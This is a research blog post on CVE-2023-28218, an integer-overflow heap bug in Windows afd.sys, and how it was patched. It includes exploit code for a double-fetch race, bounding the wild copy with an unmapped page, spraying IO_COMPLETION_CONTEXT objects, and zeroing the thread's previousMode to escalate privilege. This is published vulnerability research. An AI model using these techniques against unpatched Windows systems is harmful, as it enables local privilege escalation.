Exploiting Windows Kernel Wild Copy With User Fault Handling (CVE-2023–28218)

At Hexacon 2023, we presented our Windows kernel security research, uncovering CVE-2023-28218, a heap overflow in afd.sys. Read our exploit analysis and methodology.

Frontier Squad

Nov 09, 2023

Exploiting Windows Kernel Wild Copy With User Fault Handling (CVE-2023–28218)

Contents

Intro Background CVE-2023–28218 Exploitation Patch

Intro

On the 13th and 14th of last month, we had the opportunity to present our research at the Hexacon Conference in Paris, France. The conference was organized by Synacktiv, a French information security company, and is primarily dedicated to the technical aspects of offensive security.

We had a great time at the conference, meeting world-renowned hackers and hearing about their research. We gave a talk on Windows kernel security at the conference, talking about how we found the vulnerability in the Windows kernel and how we reliably exploited it.

In this post, I’ll take a quick look at the vulnerability we covered in the talk, and dive a little deeper into the exploits at the code level. Thankfully, the Hexacon team has posted the presentation on YouTube, so if you’re interested, you can watch it here: https://youtu.be/YTyrBnXKrcg?feature=shared

Background

We have been working on this research since the third quarter of last year with the goal of finding and exploiting vulnerabilities for Windows kernel. Early in our research, for efficient analysis, we chose the afd.sys(Ancillary Function Driver for WinSock) driver as the main target of our vulnerability analysis after filtering CVEs using the method mentioned at the beginning of the presentation. After examining past successful exploits against this driver, we found that most of the vulnerabilities occurred in the DeviceIoControl handling part. Therefore, we analyzed the DeviceIoControl part of the driver and found that the afd.sys driver has a Fast I/O. Fast I/O is a way to send and receive I/O operations to and from a device. Normally, IRP is used to perform I/O operations, but this method requires complex processes in the kernel, such as initialization of large objects and allocation of system memory. Fast I/O in Windows is a fast path feature that allows you to communicate directly with devices without generating these IRPs.

We decided to take a closer look at it, in the vague hope that other previous vulnerability researchers would have seen it less. In order for a device driver to use Fast I/O, the FastIO Dispatcher must be registered separately during the driver initialization process. The following code shows the process of FastIO Dispatch in the IopXxxControlFile function, which is called by the NtDeviceIoControlFile system call function.

__int64 __fastcall IopXxxControlFile(
        int a1,
        HANDLE Handle,
        __int64 a3,
        __int64 a4,
        unsigned __int64 a5,
        unsigned int a6,
        char *inputBuffer,
        size_t inputLength,
        char *outputBuffer,
        SIZE_T outputLength,
        char a11)
{
    ...
    FastIoDispatch = AttachedDevice->DriverObject->FastIoDispatch; // [1]
    if ( FastIoDispatch ) // [2]
    {
        FastIoDeviceControl = FastIoDispatch->FastIoDeviceControl; // [3]
        Irp = FastIoDeviceControl;
        if ( FastIoDeviceControl )
        {
            ...
            v34 = (FastIoDeviceControl)(
                    _fileObj,
                    v29,
                    inputBuffer,
                    inputLength,
                    outputBuffer,
                    outputLength,
                    ioctlCode,
                    &v62,
                    DeviceObject);
            ...

In [1], the function finds the FastIoDispatch table pointer from the DriverObject of the handle passed to the DeviceIoControl call; if the table pointer value exists in [2], it finds the FastIoDeviceControl function pointer from FastIoDispatch in [3], and calls the function pointer if the pointer exists. Note that when we call FastIoDeviceControl, we pass the inputBuffer and outputBuffer from user as is.

Our analysis target, the afd.sys driver, registers FastIoDispatch as shown below.

    memset64(DriverObject->MajorFunction, AfdDispatch, 0x1Cui64);
    DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = AfdDispatchDeviceControl;
    DriverObject->MajorFunction[IRP_MJ_INTERNAL_DEVICE_CONTROL] = AfdWskDispatchInternalDeviceControl;
    DriverObject->MajorFunction[IRP_MJ_SYSTEM_CONTROL] = &AfdEtwDispatch;
    DriverObject->FastIoDispatch = &AfdFastIoDispatch;

Also, if you look at the AfdFastIoDispatch table, you can see that the FastIoDeviceControl function pointer (AfdFastIoDeviceControl) exists.

.data:00000001C0028160 AfdFastIoDispatch dd 0E0h                 ; SizeOfFastIoDispatch
...
.data:00000001C00281B0                 dq offset AfdFastIoDeviceControl; FastIoDeviceControl

Next, let’s take a look at the vulnerability we found in the target we chose.

CVE-2023–28218

The AfdFastIoDeviceControl function processes each IOCTL of the ioctlCode passed as the 7th argument. The vulnerability occurs in the processing of the 0x120d3 (AfdSendMessage) IOCTL. This IOCTL copies the CMSG Buffer structure passed in by the user into the kernel structure format, which is briefly described below.

if ( userBuf )
{
    // [1]
    if ( AfdComputeCMSGLength(userBuf, userBufSize, &cmsgSize) < 0 )
    {
        LOBYTE(ret) = 0;
        goto EXIT;
    }
    LODWORD(userBufSize) = cmsgSize;
    // [2]
    kernelBuf = ExAllocatePoolWithQuotaTag(528, cmsgSize, 0x20646641u);
    // [3]
    LODWORD(err) = AfdCopyCMSGBuffer(kernelBuf, userBuf, userBufSize);
    ...

In [1], the user-passed CMSG Buffer structure is parsed to calculate the size of the CMSG. Then, in [2], kernel memory is allocated for that size, and in [3], the AfdCopyCMSGBuffer function is called to copy the user-passed CMSG Buffer structure into kernel memory.

We first analyzed the AfdComputeCMSGLength function to find out what type of CMSG structure the user should pass in. The following is the pseudo code for the AfdComputeCMSGLength function.

__int64 __fastcall AfdComputeCMSGLength(unsigned int *userBuf, unsigned int userBufSize, _DWORD *pCmsgSize)
{
    unsigned int totalSize; // r9d
    unsigned int chunkSize; // r10d
    unsigned int alignedSize; // eax
    ...
    for ( totalSize = 0; userBufSize >= 0xC; /**/ )
    {
        chunkSize = *userBuf;
        alignedSize = (*userBuf + 3) & 0xFFFFFFFC;
        if ( userBufSize < alignedSize )
            return 0xC000000Di64;
        userBufSize -= alignedSize;
        if ( (userBuf + alignedSize) < userBuf )
            return 0xC000000Di64;
        userBuf = (userBuf + alignedSize);
        ...
        if ( chunkSize < 0xC
        || chunkSize - 12 + 16 < chunkSize - 12
        || totalSize + ((chunkSize - 12 + 23) & 0xFFFFFFF8) < totalSize )
        {
        return 0xC000000Di64;
        }
        totalSize += (chunkSize - 12 + 23) & 0xFFFFFFF8
    }
    *pCmsgSize = totalSize;
    ...

The AfdComputeCMSGLength function reads the value of chunkSize from the user-passed pointer userBuf, increments the value of the userBuf pointer by the aligned value of chunkSize, and repeats this process for userBufSize, the size of the user-passed userBuf.

With this length calculation algorithm, we can see that a CMSG structure is organized roughly as follows. (pseudo code)

struct chunk {
    unsigned int chunkSize;
    char data[];
};

struct chunk[] CMSG;

The AfdCopyCMSGBuffer function copies the user-passed CMSG structure into kernel memory allocated by the cmsgSize computed by the AfdComputeCMSGLength function.

__int64 __fastcall AfdCopyCMSGBuffer(__int64 kernelBuf, unsigned int *userBuf, unsigned int cmsgSize)
{
      unsigned int sizeRemain;
    __int64 userChunkSize;
    __int64 kernelChunkSize;
    unsigned int alignedChunkSize;
    ...
    while ( 1 )
    {
      userChunkSize = *userBuf;
      ...
      kernelChunkSize = userChunkSize + 4;
      ...
     
      alignedChunkSize = (kernelChunkSize + 7) & 0xFFFFFFF8; // [1]
      if ( sizeRemain < alignedChunkSize ) // [2]
        return 0i64;
      sizeRemain -= alignedChunkSize;
      memmove(kernelBuf + 16, userBuf + 3, userChunkSize - 12);
      ...
    }
    ...

This function also goes through a loop and copies each CMSG chunk into kernel memory via memmove. Since this routine is copying a CMSG structure passed by a 32-bit UserProcess into 64-bit kernel memory, we can see that it performs an additional alignment operation on the chunk size.

The vulnerability lies in the 8-byte alignment for the kernelChunkSize variable in [1], which causes an integer overflow. If the user passes a value between 0xfffffff5 and 0xfffffffb as the chunk size in UserLand, alignedChunkSize will be zero and the check in [2] will pass unconditionally.

Exploitation

In this vulnerability, it is possible to overflow arbitrary data because the data being copied is a value passed by the user. So we need to consider two things when performing an exploit for this vulnerability.

The first is how large the overflowed chunk is. This is due to the memory pooling of the Windows heap allocator, as the size of the target object to be covered by triggering the overflow must be similar or the same size as the chunk that caused the overflow. The second is the size of the overflow, because if we can’t overflow to the size we want, we’ll end up with unwanted data being tampered with during the exploit, which will make it difficult to exploit reliably.

Let’s look at the first consideration, the size of the overflowed chunk. The chunk size of the userBuf that must be manipulated to trigger the vulnerability in the AfdCopyCMSGBuffer function is used to calculate the kernel buffer size to allocate in the AfdComputeCMSGLength function. Since an integer overflow must occur in that variable in order to trigger the vulnerability, creating a chunk of the desired size seems like a challenge. However, consider the following code again.

if ( userBuf )
{
    // [1]
    if ( AfdComputeCMSGLength(userBuf, userBufSize, &cmsgSize) < 0 )
    {
        LOBYTE(ret) = 0;
        goto EXIT;
    }
    LODWORD(userBufSize) = cmsgSize;
    // [2]
    kernelBuf = ExAllocatePoolWithQuotaTag(528, cmsgSize, 0x20646641u);
    // [3]
    LODWORD(err) = AfdCopyCMSGBuffer(kernelBuf, userBuf, userBufSize);
    ...

The userBuf is a UserLand pointer, and the value in that memory can be manipulated by the user. Since both AfdComputeCMSGLength and AfdCopyCMSGBuffer reference userBuf, a double fetch occurs, and we can tamper with the chunk size stored in userBuf between [1] and [3], causing an integer overflow in [3] and an arbitrary size heap buffer to be allocated in [2]. The exploit code can take advantage of double fetch by flipping the chunk size of userBuf in another thread at the same time as calling DeviceIoControl, which triggers the vulnerability, as follows.

DWORD WINAPI flippingThread(ULONG *chunkSize) {
    while (1) {
        *chunkSize ^= (originalChunkSize ^ 0xfffffffa);
    }
}

void trigger() {
    // CMSG initialization DeviceIoControl stuff
}
void main() {
    DWORD threadID;
    HANDLE x = CreateThread(0, 0, flippingThread, ptr2, 0, &threadID);
    trigger();
}

The next thing to consider is the size of the overflow.

      ...
      userChunkSize = *userBuf;
      ...
      kernelChunkSize = userChunkSize + 4;
      ...
      alignedChunkSize = (kernelChunkSize + 7) & 0xFFFFFFF8; // [1]
      ...
      memmove(kernelBuf + 16, userBuf + 3, userChunkSize - 12);

In the AfdCopyCMSGBuffer function, the size overflowed via memmove is userChunkSize - 12, which can only be a value between 0xffffffe9 and 0xffffffef because userChunkSize + 4 + 7 in [1] must overflow a 4-byte integer. Since such wild copies are generally known to be very difficult to exploit, we needed a way to abort the copy.

We noted that the copy source buffer of the kernel-called memmove is a UserLand pointer. The Windows kernel has no SMAP protection, so the kernel has direct access to user memory, and to prevent UserLand page faults from being propagated to the kernel, it handles exceptions using the __try/__except syntax, as shown below.

PAGE:00000001C003458E                 call    AfdCopyCMSGBuffer
PAGE:00000001C0034593                 mov     dword ptr [rsp+398h+err], eax
PAGE:00000001C0034597                 test    eax, eax
PAGE:00000001C0034599                 jns     short loc_1C00345A6
PAGE:00000001C003459B                 xor     bl, bl
PAGE:00000001C003459D                 mov     [rsp+398h+var_348], bl
PAGE:00000001C00345A1                 jmp     loc_1C003354E
PAGE:00000001C00345A6 ; ---------------------------------------------------------------------------
PAGE:00000001C00345A6
PAGE:00000001C00345A6 loc_1C00345A6:                          ; CODE XREF: AfdFastIoDeviceControl+1519↑j
PAGE:00000001C00345A6                 mov     r13, [rsp+398h+kernelBuf]
PAGE:00000001C00345AE                 mov     [rsp+398h+var_308], r13
PAGE:00000001C00345B6                 mov     edx, [rsp+398h+var_298+8]
PAGE:00000001C00345BD                 jmp     short loc_1C00345CA
PAGE:00000001C00345BD ;     } // starts at 1C003453F
PAGE:00000001C00345BF ; ---------------------------------------------------------------------------
PAGE:00000001C00345BF
PAGE:00000001C00345BF loc_1C00345BF:                          ; DATA XREF: .rdata:00000001C0022668↑o
PAGE:00000001C00345BF ;   __except(1) // owned by 1C003453F
PAGE:00000001C00345BF                 xor     bl, bl

We can use this to prevent wild copies during the exploit by intentionally creating unmapped memory after the userBuf memory, and passing a pointer from the unmapped memory to the number of bytes we want to copy. This can be easily implemented by using VirtualAlloc as follows.

BYTE *ptr = VirtualAlloc((PVOID)0x12340000, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
BYTE *userBuf = (BYTE *)0x12340000 + 0x1000 - copyBytes;

Now we can copy any number of bytes of data we want by allocating a chunk of any size. The next step in the exploit is which data to overwrite. Synacktiv presented in 2021 Discovering and exploiting a kernel pool overflow on modern Windows 10, we wanted to create an arbitrary decrement primitive because Windows can still obtain the address of a kernel thread object with medium integrity, and manipulating the value of the thread object’s previousMode can bypass all of the kernel’s permission checks, including memory access.

To do this, we needed to find an object that was sprayable and allowed arbitrary decrement when some member was overwritten. The object we found was IO_COMPLETION_CONTEXT, whose members are shown below.

//0x18 bytes (sizeof)
struct _IO_COMPLETION_CONTEXT
{
    VOID* Port;         //0x0
    VOID* Key;          //0x8
    VOID* UsageCount;   //0x10
};

Firstly, the IO_COMPLETION_CONTEXT object is allocated and deallocated arbitrarily by the user through the NtSetInformationFile system call, allowing it to be sprayed. Let's look at the code of the NtSetInformationFile system call where IO_COMPLETION_CONTEXT is allocated and deallocated. The IO_COMPLETION_CONTEXT object is allocated as shown below.

case FileCompletionInformation:
    ...
    // [1]
    Status = ObReferenceObjectByHandle(hdl, 2u, IoCompletionObjectType, v73, &Object, 0i64);
    if ( Status >= 0 )
    {
      // [2]
      PoolWithTag = (_IO_COMPLETION_CONTEXT *)ExAllocatePoolWithTag(NonPagedPoolNx, 0x18ui64, 0x63436F49u);
      if ( PoolWithTag )
      {
        v53 = KeAcquireSpinLockRaiseToDpc(&FileObject->IrpListLock);
        if ( FileObject->CompletionContext )
        {
          ...
        }
        else
        {
          FileObject->Flags &= ~0x400u;
          // [3]
          PoolWithTag->Port = Object;
          PoolWithTag->Key = v50[1];
          PoolWithTag->UsageCount = 0i64;
          FileObject->CompletionContext = PoolWithTag;

We can allocate the object by passing FileCompletionInformation as the value of the FileInformationClass argument to the NtSetInformationFile system call. The object allocation first gets an IoCompletionObject object for the given handle in [1] and allocates memory for the IO_COMPLETION_CONTEXT object in [2]. Next, the function initialize the object members in [3], where you can see that it initializes an object pointer to the Port member.

And here is the code that releases the IO_COMPLETION_CONTEXT object.

case FileReplaceCompletionInformation:
    ...
    v56 = FileObject;
    if ( FileObject->CompletionContext )
    {
        ...
        // [1]
        Status = IopReplaceCompletionPort(v56, v55, v54.MasterIrp->MdlAddress);

Passing FileReplaceCompletionInformation as the value of the FileInformationClass argument to the NtSetInformationFile system call calls the IopReplaceCompletionPort function with the file object given as an argument.

__int64 __fastcall IopReplaceCompletionPort(PFILE_OBJECT a1, void *a2, void *a3)
{
  ...
  p_IrpListLock = &a1->IrpListLock;
  v7 = -1073741823;
  v8 = KeAcquireSpinLockRaiseToDpc(&a1->IrpListLock);
  CompletionContext = a1->CompletionContext;
  v10 = v8;
  if ( CompletionContext && a1->IrpList.Flink == &a1->IrpList && !CompletionContext->UsageCount )
  {
    ObfDereferenceObjectWithTag(CompletionContext->Port, 0x746C6644u);

The IopReplaceCompletionPort function finds a CompletionContext object from the file object and dereferences the Port object member of that object. If we overwrite the Port member of an IO_COMPLETION_CONTEXT object allocated by spraying through an overflow with some address, and release that IO_COMPLETION_CONTEXT object through FileReplaceCompletionInformation, we can decrement the value of some address by one.

In C, spraying an IO_COMPLETION_CONTEXT object would look like this:

void CreateCompletionObject(PIPE_HANDLES* out) {
    PIPE_HANDLES pp;
    CreatePipeWrapper(&pp);
    IO_STATUS_BLOCK io;
    DWORD64 input[2];
    input[0] = (DWORD64)hiocom;
    input[1] = (DWORD64)0x41414141;
    int ret1, ret2;
    ret1 = NtSetInformationFile(pp.w, &io, (PVOID)input, 0x10, (FILE_INFORMATION_CLASS)0x1E);
    ret2 = NtSetInformationFile(pp.r, &io, (PVOID)input, 0x10, (FILE_INFORMATION_CLASS)0x1E);
    out->w = pp.w;
    out->r = pp.r;
}
    
void spray() {
    NtCreateIoCompletion(&hiocom, GENERIC_ALL, NULL, 0);
    // spray IO_COMPLETION_CONTEXT
    for (int i = 0; i < SPRAYSIZE; i++) {
        CreateCompletionObject(&spray[i]);
    }
}

The release of the object can be implemented by simply using CloseHandle API to close the HANDLE obtained through CreateCompletionObject.

The exploit is then finalized by converting the current thread to kernel mode by setting the value of the current thread’s previousMode (thread + 0x232) to zero.

Patch

The patch uses a wrapper function to prevent integer overflows in integer operations that existed in AfdComputeCMSGLength and AfdCopyCMSGBuffer.

__int64 __fastcall AfdCopyCMSGBuffer(size_t *pResult, size_t a2, ULONG *a3, ULONG a4)
{
    ...
    if ( RtlULongSub(userChunkSize, 0xCu, &v14) < 0 )
      break;
    copyBytes = v14;
    if ( RtlSizeTAdd(v14, 0x10ui64, kernelBuf) < 0
      || (int)RtlSizeTAlignUp(*kernelBuf, 16i64, &Subtrahend) < 0
      || RtlSizeTSub(Minuend, Subtrahend, &Minuend) < 0 )
    {
      break;
    }
    ...
    memmove(kernelBuf + 2, userBuf, copyBytes);
    ...
}